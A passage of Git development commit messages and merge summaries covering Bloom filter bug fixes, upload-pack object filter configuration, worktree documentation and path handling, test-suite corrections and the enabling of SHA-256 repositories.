gitremote-helpers into section 7, 2019-03-25), but command-list.txt was
not updated at the time.
Add these two guides to the list of guides in 'command-list.txt', so
that they appear in the output of 'git help --guides', and capitalize
the first word of the description of 'gitcredentials', as was done in
1b81d8c (help: use command-list.txt for the source of guides,
2018-05-20) for the other guides.
While at it, add a comment in Documentation/Makefile to remind developers
to update command-list.txt if they add a new guide.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Get rid of the trailing dot and mark for translation.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pretend-object mechanism checks if the given object already
exists in the object store before deciding to keep the data
in-core, but the check would have triggered lazy fetching of such
an object from a promissor remote.
* jt/pretend-object-never-come-from-elsewhere:
sha1-file: make pretend_object_file() not prefetch
While packing many objects in a repository with a promissor remote,
lazily fetching missing objects from the promissor remote one by
one may be inefficient---the code now attempts to fetch all the
missing objects in batch (obviously this won't work for a lazy
clone that lazily fetches tree objects as you cannot even enumerate
what blobs are missing until you learn which trees are missing).
* jt/pack-objects-prefetch-in-batch:
pack-objects: prefetch objects to be packed
pack-objects: refactor to oid_object_info_extended
If we're given an empty pathspec, we refuse to set up bloom filters, as
described in f3c2a36810 (revision: empty pathspecs should not use Bloom
filters, 2020-07-01).
But before the empty string check, we drop any trailing slash by
allocating a new string without it. So a pathspec consisting only of "/"
will allocate that string, but then still cause us to bail, leaking the
new string. Let's make sure to free it.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running t4216 with ASan results in it complaining of an out-of-bounds
read in prepare_to_use_bloom_filter(). The issue is this code to strip a
trailing slash:
last_index = pi->len - 1;
if (pi->match[last_index] == '/') {
because we have no guarantee that pi->len isn't zero. This can happen if
the pathspec is ".", as we translate that to an empty string. And if
that read of random memory does trigger the conditional, we'd then do an
out-of-bounds write:
path_alloc = xstrdup(pi->match);
path_alloc[last_index] = '\0';
Let's make sure to check the length before subtracting. Note that for an
empty pathspec, we'd end up bailing from the function a few lines later,
which makes it tempting to just:
if (!pi->len)
return;
early here. But our code here is stripping a trailing slash, and we need
to check for emptiness after stripping that slash, too. So we'd have two
blocks, which would require repeating some cleanup code.
Instead, just skip the trailing-slash for an empty string. Setting
last_index at all in the case is awkward since it will have a nonsense
value (and it uses an "int", which is a too-small type for a string
anyway). So while we're here, let's:
- drop last_index entirely; it's only used in two spots right next to
each other and writing out "pi->len - 1" in both is actually easier
to follow
- use xmemdupz() to duplicate the string. This is slightly more
efficient, but more importantly makes the intent more clear by
allocating the correct-sized substring in the first place. It also
eliminates any question of whether path_alloc is as long as
pi->match (which it would not be if pi->match has any embedded NULs,
though in practice this is probably impossible).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Compiling with gcc-10, -O2, and -fsanitize=undefined results in a
compiler warning:
config.c: In function ‘git_config_copy_or_rename_section_in_file’:
config.c:3170:17: error: writing 1 byte into a region of size 0 [-Werror=stringop-overflow=]
3170 | output[0] = '\t';
| ~~~~~~~~~~^~~~~~
config.c:3076:7: note: at offset -1 to object ‘buf’ with size 1024 declared here
3076 | char buf[1024];
| ^~~
This is a false positive. The interesting lines of code are:
int i;
char *output = buf;
...
for (i = 0; buf[i] && isspace(buf[i]); i++)
; /* do nothing */
...
int offset;
offset = section_name_match(&buf[i], old_name);
if (offset > 0) {
...
output += offset + i;
if (strlen(output) > 0) {
/*
* More content means there's
* a declaration to put on the
* next line; indent with a
* tab
*/
output -= 1;
output[0] = '\t';
}
}
So we do assign output to buf initially. Later we increment it based on
"offset" and "i" and then subtract "1" from it. That latter step is what
the compiler is complaining about; it could lead to going off the left
side of the array if "output == buf" at the moment of the subtraction.
For that to be the case, then "offset + i" would have to be 0. But that
can't happen:
- we know that "offset" is at least 1, since we're in a conditional
block that checks that
- we know that "i" is not negative, since it started at 0 and only
incremented over whitespace
So the sum must be at least 1, and therefore it's OK to subtract one
from "output".
But that's not quite the whole story. Since "i" is an int, it could in
theory be possible to overflow to negative (when counting whitespace on
a very large string). But we know that's impossible because we're
counting the 1024-byte buffer we just fed to fgets(), so it can never be
larger than that.
Switching the type of "i" to "unsigned" makes the warning go away, so
let's do that.
Arguably size_t is an even better type (for this and for the other
length fields), but switching to it produces a similar but distinct
warning:
config.c: In function ‘git_config_copy_or_rename_section_in_file’:
config.c:3170:13: error: array subscript -1 is outside array bounds of ‘char[1024]’ [-Werror=array-bounds]
3170 | output[0] = '\t';
| ~~~~~~^~~
config.c:3076:7: note: while referencing ‘buf’
3076 | char buf[1024];
| ^~~
If we were to ever switch off of fgets() to strbuf_getline() or similar,
we'd probably need to use size_t to avoid other overflow problems. But
for now we know we're safe because of the small fixed size of our
buffer.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When citing other Git commands, rather than merely formatting them with
a fixed-width typeface, improve the reader experience by linking to them
directly via `linkgit:`.
Suggested-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When reading the rendered description of `add`, it's easy to trip over
and miss the end of one sentence and the start of the next, making it
seem as if they are part of the same statement, separated only by a
dash:
... specific files such as HEAD, index, etc. - may also be
specified as <commit-ish>; it is synonymous with...
This can be particularly confusing since the thoughts expressed by the
two sentences are unrelated. Reduce the likelihood of confusion by
making it obvious that the two sentences are distinct.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As originally composed, git-worktree.txt employed a mix of "worktree"
and "working tree" which was inconsistent and potentially confusing to
readers. bc483285b7 (Documentation/git-worktree: consistently use term
"linked working tree", 2015-07-20) undertook the task of employing the
term "working tree" consistently throughout the document and avoiding
"worktree" altogether for descriptive text. Since that time, some
instances of "worktree" have crept back in. Continue the work of
bc483285b7 by transforming these to "working tree", as well.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git-worktree documentation generally does a good job of formatting
literal text using a fixed-width typeface, however, some instances of
unformatted literal text have crept in over time. Fix these.
While at it, also fix a few incorrect typefaces resulting from wrong
choice of Asciidoc quotes.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In b79cf959b2 (upload-pack.c: allow banning certain object filter(s),
2020-02-26), we introduced functionality to disallow certain object
filters from being chosen from within 'git upload-pack'. Traditionally,
administrators use this functionality to disallow filters that are known
to perform slowly, for e.g., those that do not have bitmap-level
filtering.
In the past, the '--filter=tree:<n>' was one such filter that does not
have bitmap-level filtering support, and so was likely to be banned by
administrators.
However, in the previous couple of commits, we introduced bitmap-level
filtering for the case when 'n' is equal to '0', i.e., as if we had a
'--filter=tree:none' choice.
While it would be sufficient to simply write
$ git config uploadpackfilter.tree.allow true
(since it would allow all values of 'n'), we would like to be able to
allow this filter for certain values of 'n', i.e., those no greater than
some pre-specified maximum.
In order to do this, introduce a new configuration key, as follows:
$ git config uploadpackfilter.tree.maxDepth <m>
where '<m>' specifies the maximum allowed value of 'n' in the filter
'tree:n'. Administrators who wish to allow for only the value '0' can
write:
$ git config uploadpackfilter.tree.allow true
$ git config uploadpackfilter.tree.maxDepth 0
which allows '--filter=tree:0', but no other values.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git clients may ask the server for a partial set of objects, where the
set of objects being requested is refined by one or more object filters.
Server administrators can configure 'git upload-pack' to allow or ban
these filters by setting the 'uploadpack.allowFilter' variable to
'true' or 'false', respectively.
However, administrators using bitmaps may wish to allow certain kinds of
object filters, but ban others. Specifically, they may wish to allow
object filters that can be optimized by the use of bitmaps, while
rejecting other object filters which aren't and represent a perceived
performance degradation (as well as an increased load factor on the
server).
Allow configuring 'git upload-pack' to support object filters on a
case-by-case basis by introducing two new configuration variables:
- 'uploadpackfilter.allow'
- 'uploadpackfilter.<kind>.allow'
where '<kind>' may be one of 'blobNone', 'blobLimit', 'tree', and so on.
Setting the second configuration variable for any valid value of
'<kind>' explicitly allows or disallows restricting that kind of object
filter.
If a client requests the object filter <kind> and the respective
configuration value is not set, 'git upload-pack' will default to the
value of 'uploadpackfilter.allow', which itself defaults to 'true' to
maintain backwards compatibility. Note that this differs from
'uploadpack.allowfilter', which controls whether or not the 'filter'
capability is advertised.
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a subsequent commit, we will add configuration options that are
specific to each kind of object filter, in which case it is handy to
have a function that translates between 'enum
list_objects_filter_choice' and an appropriate configuration-friendly
string.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit 508fd8e8ba.
In 6e6029a8 (fmt-merge-msg: allow merge destination to be omitted again)
we get back the behavior where merges against 'master', by default, do
not include "into 'master'" at the end of the merge message. This test
fix is no longer needed.
Signed-off-by: Emily Shaffer <emilyshaffer@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make it clear that the filename has only the rest of the object ID,
not the entirety of it.
Signed-off-by: Noam Yorav-Raphael <noamraph@gmail.com>
Acked-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'merge' command is not the only one that does merges; other commands
like checkout -m or rebase do as well. Unfortunately, the only area of
the code that checked for the "merge.renormalize" config setting was in
builtin/merge.c, meaning it could only affect merges performed by the
"merge" command. Move the handling of this config setting to
merge_recursive_config() so that other commands can benefit from it as
well. Fixes a few tests in t6038.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6038.11, 'cherry-pick patch from after text=auto' was a test of
undefined behavior. To make matters worse, while there are a couple
possible correct answers, this test was coded to only check for an
obviously incorrect answer. And the final cherry on top is that the
test is marked test_expect_failure, meaning it can't provide much value,
other than possibly confusing future folks who come along and try to
work on attributes and look at existing tests. Because of all these
problems, just remove the test.
But for any future code spelunkers, here's my understanding of the two
possible correct answers:
This test was set up so that on a branch with no .gitattributes file,
you cherry-picked a patch from a branch that had a .gitattributes file
(containing '* text=auto'). Further, the two branches had a file which
differed only in line endings. In this situation, correct behavior is
not well defined: should the .gitattributes file affect the merge or
not?
If the .gitattributes file on the other branch should not affect the
merge, then we would have a content conflict with all three stages
different (the merge base didn't match either side).
If the .gitattributes file from the other branch should affect the
merge, then we would expect the line endings to be normalized to LF for
the version to be recorded in the repository. This would mean that when
doing a three-way content merge on the file that differed in line
endings, that the three-way content merge would see that the versions on
both sides matched and so the cherry-pick has no conflicts and can
succeed. The line endings in the file as recorded in the repository
will change from CRLF to LF. The version checked out in the working
copy will depend on the platform (since there's no eol attribute defined
for the file).
Also, as a final side note, this test expected an error message that was
built assuming cherry-pick was the old scripted version, because
cherry-pick no longer uses the error message that was encoded in this
test. So it was wrong for yet another reason.
Given that the handling of .gitattributes is not well defined and this
test was obviously broken and could do nothing but confuse future
readers, just remove it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6038 had a pair of tests that were expected to fail, but weren't
failing for the expected reason. Both were meant to do a merge that
could be done cleanly after renormalization, but were supposed to fail
for lack of renormalization. Unfortunately, both tests had staged
changes, and checkout -m would abort due to the presence of those staged
changes before even attempting a merge.
Fix this first issue by utilizing git-restore instead of git-checkout,
so that the index is left alone and just the working directory gets the
changes we want.
However, there is a second issue with these tests. Technically, they
just wanted to verify that after renormalization, no conflicts would be
present. This could have been checked for by grepping for a lack of
conflict markers, but the test instead tried to compare the working
directory files to an expected result. Unfortunately, the setting of
"text=auto" without setting core.eol to any value meant that the content
of the file (in particular, the line endings) would be
platform-dependent and the tests could only pass on some platforms.
Replace the existing comparison with a call to 'git diff --no-index
--ignore-cr-at-eol' to verify that the contents, other than possible
carriage returns in the file, match the expected results and in
particular that the file has no conflicts from the checkout -m
operation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Write the hexadecimal object ID directly into the destination buffer
using oid_to_hex_r() instead of writing it into a static buffer first
using oid_to_hex() and then copying it from there using memcpy().
This is shorter, simpler and a bit more efficient.
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commits 7c0a6c8e47 ("merge-recursive: move some definitions around to
clean up the header", 2019-08-17), and b4db8a2b76 ("merge-recursive:
remove useless parameter in merge_trees()", 2019-08-17) added some
useful documentation to the functions, but had a few places where the
new comments were unclear or even misleading. Fix those comments.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use
printf '\0'
to generate a NUL byte which we then `dd` into the packfile to ensure
that we modify the first byte of the first object, thereby
(probabilistically) invalidating the checksum. Except the single quotes
we're using are interpreted to match with the ones we enclose the whole
test in. So we actually execute
printf \0
and end up injecting the ASCII code for "0", 0x30, instead.
The comment right above this `printf` invocation says that "at least one
of [the type bits] is not zero, so setting the first byte to 0 is
sufficient". Substituting "0x30" for "0" in that comment won't do: we'd
need to reason about which bits go where and just what the packfile
looks like that we're modifying in this test.
Let's avoid all of that by actually executing
printf "\0"
to generate a NUL byte, as intended.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git merge" learned to selectively omit " into <branch>" at the end
of the title of default merge message with merge.suppressDest
configuration.
* jc/fmt-merge-msg-suppress-destination:
fmt-merge-msg: allow merge destination to be omitted again
Revert "fmt-merge-msg: stop treating `master` specially"
In order for "git-worktree list" to present consistent results,
get_main_worktree() performs manual normalization on the repository
path (returned by get_common_dir()) after passing it through
strbuf_add_absolute_path(). In particular, it cleans up the path for
three distinct cases when the current working directory is (1) the main
worktree, (2) the .git/ subdirectory, or (3) a bare repository.
The need for such special-cases is a direct consequence of employing
strbuf_add_absolute_path() which, for the sake of efficiency, doesn't
bother normalizing the path (such as folding out redundant path
components) after making it absolute. Lack of normalization is not
typically a problem since redundant path elements make no difference
when working with paths at the filesystem level. However, when preparing
paths for presentation, possible redundant path components make it
difficult to ensure consistency.
Eliminate the need for these special cases by instead making the path
absolute via strbuf_add_real_path() which normalizes the path for us.
Once normalized, the only case we need to handle manually is converting
it to the path of the main worktree by stripping the "/.git" suffix.
This stripping of the "/.git" suffix is a regular idiom in
worktree-related code; for instance, it is employed by
get_linked_worktree(), as well.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The content of .git/worktrees/<id>/gitdir must be a path of the form
"/path/to/worktree/.git". Any other content would be indicative of a
corrupt "gitdir" file. To determine the path of the worktree itself one
merely strips the "/.git" suffix, and this is indeed how the worktree
path was determined from inception.
However, 5193490442 (worktree: add a function to get worktree details,
2015-10-08) extended the path manipulation in a mysterious way. If it is
unable to strip "/.git" from the path, then it instead reports the
current working directory as the linked worktree's path:
if (!strbuf_strip_suffix(&worktree_path, "/.git")) {
strbuf_reset(&worktree_path);
strbuf_add_absolute_path(&worktree_path, ".");
strbuf_strip_suffix(&worktree_path, "/.");
}
This logic is clearly bogus; it can never be generally correct behavior.
It materialized out of thin air in 5193490442 with neither explanation
nor tests to illustrate a case in which it would be desirable.
It's possible that this logic was introduced to somehow deal with a
corrupt "gitdir" file, so that it returns _some_ sort of meaningful
value, but returning the current working directory is not helpful. In
fact, it is quite misleading (except in the one specific case when the
current directory is the worktree whose "gitdir" entry is corrupt).
Moreover, reporting the corrupt value to the user, rather than fibbing
about it and hiding it outright, is more helpful since it may aid in
diagnosing the problem.
Therefore, drop this bogus path munging and restore the logic to the
original behavior of merely stripping "/.git".
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This code has been unused since fa099d2322 (worktree.c: kill parse_ref()
in favor of refs_resolve_ref_unsafe(), 2017-04-24), so drop it.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The content of this strbuf is unconditionally detached several lines
before the strbuf_release() and the strbuf is never touched again after
that point.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
b6839fda68 (ref-filter: add support for %(contents:size), 2020-07-16)
added a new format for ref-filter, and added a function to generate
tests for this new feature in t6300. Unfortunately, it tries to run
`test_expect_sucess' instead of `test_expect_success', and writes
$expect to `expected', but tries to read `expect'. Those two issues
were probably unnoticed because the script only printed errors, but did
not crash. This fixes these issues.
Signed-off-by: Alban Gruin <alban.gruin@gmail.com>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
523fa69c (reflog: cleanse messages in the refs.c layer, 2020-07-10)
centralized reflog normalizaton. However, the normalizaton added a
leading "\t" to the message. This is an artifact of the reflog
storage format in the files backend, so it should be added there.
Routines that parse back the reflog (such as grab_nth_branch_switch)
expect the "\t" to not be in the message, so without this fix, git
with reftable cannot process the "@{-1}" syntax.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
CI fixup---tests of Python scripts didn't use the version of Git
that is being tested.
* sg/ci-git-path-fix-with-pyenv:
ci: use absolute PYTHON_PATH in the Linux jobs
The "argc" and "argv" names made sense when the struct was argv_array,
but now they're just confusing. Let's rename them to "nr" (which we use
for counts elsewhere) and "v" (which is rather terse, but reads well
when combined with typical variable names like "args.v").
Note that we have to update all of the callers immediately. Playing
tricks with the preprocessor is hard here, because we wouldn't want to
rewrite unrelated tokens.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git mv src dst", when src is an unmerged path, errored out
correctly but with an incorrect error message to claim that src is
not tracked, which has been clarified.
* ct/mv-unmerged-path-error:
git-mv: improve error message for conflicted file
Pushing a ref whose name contains non-ASCII character with the
"--force-with-lease" option did not work over smart HTTP protocol,
which has been corrected.
* bc/push-cas-cquoted-refname:
remote-curl: make --force-with-lease work with non-ASCII ref names
"git for-each-ref --format=<>" learned %(contents:size).
* cc/pretty-contents-size:
ref-filter: add support for %(contents:size)
t6300: test refs pointing to tree and blob
Documentation: clarify %(contents:XXXX) doc
Fetching from a lazily cloned repository resulted at the server
side in attempts to lazy fetch objects that the client side has,
many of which will not be available from the third-party anyway.
* jt/avoid-lazy-fetching-upon-have-check:
upload-pack: do not lazy-fetch "have" objects
Dev support to limit the use of test_must_fail to only git commands.
* dl/test-must-fail-fixes-6:
test-lib-functions: restrict test_must_fail usage
t9400: don't use test_must_fail with cvs
t9834: remove use of `test_might_fail p4`
t7107: don't use test_must_fail()
t5324: reorder `run_with_limited_open_files test_might_fail`
t3701: stop using `env` in force_color()
With the base fix to 2.27 regresion, any new extensions in a v0
repository would still be silently honored, which is not quite
right. Instead, complain and die loudly.
* jk/reject-newer-extensions-in-v0:
verify_repository_format(): complain about new extensions in v0 repo
Preliminary clean-up of the refs API in preparation for adding a
new refs backend "reftable".
* hn/reftable:
reflog: cleanse messages in the refs.c layer
bisect: treat BISECT_HEAD as a pseudo ref
t3432: use git-reflog to inspect the reflog for HEAD
lib-t6000.sh: write tag using git-update-ref
"git clone --separate-git-dir=$elsewhere" used to stomp on the
contents of the existing directory $elsewhere, which has been
taught to fail when $elsewhere is not an empty directory.
* bw/fail-cloning-into-non-empty:
git clone: don't clone into non-empty directory
"git help log" has been enhanced by sharing more material from the
documentation for the underlying "git rev-list" command.
* pb/log-rev-list-doc:
git-log.txt: include rev-list-description.txt
git-rev-list.txt: move description to separate file
git-rev-list.txt: tweak wording in set operations
git-rev-list.txt: fix Asciidoc syntax
revisions.txt: describe 'rev1 rev2 ...' meaning for ranges
git-log.txt: add links to 'rev-list' and 'diff' docs
The test framework has been updated so that most tests will run
with predictable (artificial) timestamps.
* jk/tests-timestamp-fix:
t9100: stop depending on commit timestamps
test-lib: set deterministic default author/committer date
t9100: explicitly unset GIT_COMMITTER_DATE
t5539: make timestamp requirements more explicit
t9700: loosen ident timezone regex
t6000: use test_tick consistently
Updates to the changed-paths bloom filter.
* ds/commit-graph-bloom-updates:
commit-graph: check all leading directories in changed path Bloom filters
revision: empty pathspecs should not use Bloom filters
revision.c: fix whitespace
commit-graph: check chunk sizes after writing
commit-graph: simplify chunk writes into loop
commit-graph: unify the signatures of all write_graph_chunk_*() functions
commit-graph: persist existence of changed-paths
bloom: fix logic in get_bloom_filter()
commit-graph: change test to die on parse, not load
commit-graph: place bloom_settings in context
The changed-path Bloom filter is improved using ideas from an
independent implementation.
* sg/commit-graph-cleanups:
commit-graph: simplify write_commit_graph_file() #2
commit-graph: simplify write_commit_graph_file() #1
commit-graph: simplify parse_commit_graph() #2
commit-graph: simplify parse_commit_graph() #1
commit-graph: clean up #includes
diff.h: drop diff_tree_oid() & friends' return value
commit-slab: add a function to deep free entries on the slab
commit-graph-format.txt: all multi-byte numbers are in network byte order
commit-graph: fix parsing the Chunk Lookup table
tree-walk.c: don't match submodule entries for 'submod/anything'
In Git 2.28, we stopped special casing 'master' when producing the
default merge message by just removing the code to squelch "into
'master'" at the end of the message.
Introduce multi-valued merge.suppressDest configuration variable
that gives a set of globs to match against the name of the branch
into which the merge is being made, to let users specify for which
branch fmt-merge-msg's output should be shortened. When it is not
set, 'master' is used as the sole value of the variable by default.
The above move mostly reverts the pre-2.28 default in repositories
that have no relevant configuration.
Add a few tests to protect the behaviour with the new configuration
variable from future regression.
Helped-by: Linus Torvalds <torvalds@linux-foundation.org>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit 489947cee5, which
stopped treating merges into the 'master' branch as special when
preparing the default merge message. As the goal was not to have
any single branch designated as special, it solved it by leaving the
"into <branchname>" at the end of the title of the default merge
message for any and all branches. An obvious and easy alternative
to treat everybody equally could have been to remove it for every
branch, but that involves loss of information.
We'll introduce a new mechanism to let end-users specify merges into
which branches would omit the "into <branchname>" from the title of
the default merge message, and make the mechanism, when unconfigured,
treat the traditional 'master' special again, so all the changes to
the tests we made earlier will become unnecessary, as these tests
will be run without configuring the said new mechanism.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we call test_oid_init in the setup for all test scripts,
there's no point in calling it individually. Remove all of the places
where we've done so to help keep tests tidy.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have Git supporting SHA-256, we'd like to make sure that we
don't regress that state. Unfortunately, it's easy to do so, so to
help, let's add code to run one of our CI jobs with SHA-256 as the
default hash. This will help us detect any problems that may occur.
We pick the linux-clang job because it's relatively fast and the
linux-gcc job already runs the testsuite twice. We want our tests to
run as fast as possible, so we wouldn't want to add a third run to the
linux-gcc job. To make sure we properly exercise the code, let's run
the tests in the default mode (SHA-1) first and then run a second time
with SHA-256. We explicitly specify SHA-1 for the first run so that if
we change the default in the future, we make sure to test both cases.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, the SHA1 prerequisite depends on the output of git
hash-object. However, in order for that to produce sane behavior, we
must be in a repository. If we are not, the default will remain SHA-1,
and we'll produce wrong results if we're using SHA-256 for the testsuite
but the test assertion starts when we're not in a repository.
Check the environment variable we use for this purpose, leaving it to
default to SHA-1 if none is specified.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To allow developers to run the testsuite with a different algorithm than
the default, provide an environment variable, GIT_TEST_DEFAULT_HASH, to
specify the algorithm to use. Compute the fixed constants using
test_oid. Move the constant initialization down below the point where
test-lib-functions.sh is loaded so the functions are defined.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In some tests, we have data files which are written with a particular
hash algorithm. Instead of keeping two copies of the test files, we can
keep one, and translate the value on the fly.
In order to do so, we'll need to read both the source algorithm and the
current algorithm, so add an optional flag to the test_oid helper that
lets us look up a value for a specified hash algorithm. This should
not cause any conflicts with existing tests, since key arguments to
test_oid are allowed to contains only shell identifier characters.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have a complete SHA-256 implementation in Git, let's enable
it so people can use it. Remove the ENABLE_SHA256 define constant
everywhere it's used. Add tests for initializing a repository with
SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The transition plan specifies extensions.objectFormat as the indication
that we're using a given hash in a certain repo. Read this as one of
the extensions we support. If the user has specified an invalid value,
fail.
Ensure that we reject the extension if the repository format version is
0.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently we detect the hash algorithm in use by the length of the
object ID. This is inelegant and prevents us from using a different
hash algorithm that is also 256 bits in length.
Since we cannot extend the v2 format in a backward-compatible way, let's
add a v3 format, which is identical, except for the addition of
capabilities, which are prefixed by an at sign. We add "object-format"
as the only capability and reject unknown capabilities, since we do not
have a network connection and therefore cannot negotiate with the other
side.
For compatibility, default to the v2 format for SHA-1 and require v3
for SHA-256.
In t5510, always use format v3 so we can be sure we produce consistent
results across hash algorithms. Since head -n N lists the top N lines
instead of the Nth line, let's run our output through sed to normalize
it and compare it against a fixed value, which will make sure we get
exactly what we're expecting.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A recently added test in t5702 started using git verify-pack outside of
a repository. While this poses no problems with SHA-1, with SHA-256 we
implicitly rely on the setup of the repository to initialize our hash
algorithm settings.
Since we're not in a repository here, we need to provide git verify-pack
help to set things up properly. git index-pack already knows an
--object-format option, so let's accept one as well and pass it down to
our git index-pack invocation. Since we're now dynamically adjusting
the elements in argv, let's switch to using struct argv_array to manage
them. Finally, let's make t5702 pass the proper argument on down to its
git verify-pack caller.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In dd4b732df7 ("upload-pack: send part of packfile response as uri",
2020-06-10), the git http-fetch code learned how to take ac --packfile
option. This option takes an argument, which is the name of a packfile
hash, and parses it using parse_oid_hex. It does so before calling
setup_git_directory.
However, in a SHA-256 repository this fails to work, since we have not
set the hash algorithm in use and parse_oid_hex fails as a consequence.
To ensure that we can parse packfile hashes of the right length, let's
set up the git directory before we start parsing arguments.
Since we still want to allow the invocation of -h to print the help when
we're not in a repository, gracefully handle us being outside of one and
produce an error after argument parsing has finished.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
These tests try to check that we behave properly if we encounter a
repository with version 0 but an extension. This is a laudable goal,
but the test cannot work with SHA-256, since SHA-256 repositories always
have an existing extension and are never version 0.
Add a SHA1 prerequisite to these tests.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test needs multiple object IDs that have the same first byte.
Update the pack test code to generate a suitable packed value for
SHA-256. Update the test to use this value when using SHA-256.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl test script for t9700 was matching on exactly 40 hex
characters. With SHA-256, we'll have 64 hex-character object IDs.
Create a variable with a regex which matches exactly 40 or 64 hex
characters and use that to match the output. Note that both of the uses
of this can be anchored, which makes the code simpler, so do that as
well.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we use a hash algorithm other than SHA-1, it's important to
preserve the hash-related values in the config file, but this test
overwrites the config file with a new one. Ensure we copy these values
properly from the old config to the new one so that the repository can
be read if it's using SHA-256.
Note that if there is no extensions.objectFormat value set, git config
will return unsuccessfully if we try to read it; since this is not an
error for us, use test_might_fail.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This test checks for several commit object sizes to verify that objects
are encoded as expected. However, the size of a commit object differs
